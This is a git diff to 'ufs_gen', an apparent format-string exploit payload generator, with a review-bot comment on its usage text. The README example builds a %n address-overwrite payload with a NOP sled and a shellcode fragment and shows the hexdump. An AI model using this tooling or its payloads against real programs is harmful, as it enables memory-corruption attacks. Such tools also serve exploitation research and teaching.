-rw-r--r--README20
-rw-r--r--main.c9
2 files changed, 27 insertions, 2 deletions
diff --git a/README b/README
index b2d9679..d8d3358 100644
--- a/README
+++ b/README
@@ -38,12 +38,32 @@ is not 4 bytes long, there is very few chances that it would work correctly.
The support of printf(payload) directly (i.e. without a temporary buffer) is
also planned.
+We support the option --prefix and --suffix which respectively prepend and
+append their argument to the payload.
+
+We also support the option --sfxnops which adds n NOP byte (0x90) between the
+payload and the suffix
+
Example
=======
user@localhost$ ./ufs_gen --override 0x11223344 --with 0x55667788 --stackidx 4
D3"E3"F3"G3"%120x%4$n%239x%5$n%239x%6$n%239x%7$n
+user@localhost$ shellcode="$(perl -e 'print "\x68\x2f\x73\x68\xff\xfe\x44"')"
+user@localhost$ ./ufs_gen --override 0x11223344 --with 0x55667788 --stackidx 4 --suffix "$shellcode" --sfxnops 100 | hexdump -C
+NOP bytes are at offset 52 (0x34)
+suffix is at offset 152 (0x98)
+00000000 44 33 22 11 45 33 22 11 46 33 22 11 47 33 22 11 |D3".E3".F3".G3".|
+00000010 25 31 32 30 78 25 34 24 6e 25 32 33 39 78 25 35 |%120x%4$n%239x%5|
+00000020 24 6e 25 32 33 39 78 25 36 24 6e 25 32 33 39 78 |$n%239x%6$n%239x|
+00000030 25 37 24 6e 90 90 90 90 90 90 90 90 90 90 90 90 |%7$n............|
+00000040 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
+*
+00000090 90 90 90 90 90 90 90 90 68 2f 73 68 ff fe 44 |........h/sh..D|
+0000009f
+
+
License
=======
diff --git a/main.c b/main.c
index 4f4dc97..ac07f54 100644
--- a/main.c
+++ b/main.c
@@ -50,8 +50,13 @@ static int suffix_nops_g = 0;
__attribute__((noreturn))
static void usage(const char *arg0)
{
- fprintf(stderr, "usage: %s --override addr --with addr --stackidx idx\n", arg0);
- fprintf(stderr, " %s --override addr --with addr --stackidx idx --addrsize size\n", arg0);
+ (void)arg0;
+
+ fputs("usage:\n\n", stderr);
+ fputs(
+ "ufs_gen "
+ "[--prefix pfx] [--suffix sfx] [--sfxnops n]\n"
+ " --override addr --with addr --stackidx idx\n", stderr);
exit(EX_USAGE);
}
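Review bot: The rewritten usage text drops the `--addrsize size` form that the removed second fprintf line documented, so unless this commit also removes that option (not visible in this hunk) the help output no longer mentions it; add `"[--addrsize size] "` to the bracketed option list next to `[--sfxnops n]`. The `(void)arg0;` line discards argv[0] in favour of the hard-coded name "ufs_gen", which goes stale if the binary is installed under another name; keeping a literal format with the name as an argument, `fprintf(stderr, "%s [--prefix pfx] [--suffix sfx] [--sfxnops n]\n", arg0);`, preserves the invoked name while still avoiding a non-literal format string. The removal of the `arg0` use also makes the parameter dead, so if the hard-coded name is intentional a short comment such as `/* program name is fixed on purpose; arg0 is unused */` would explain the cast.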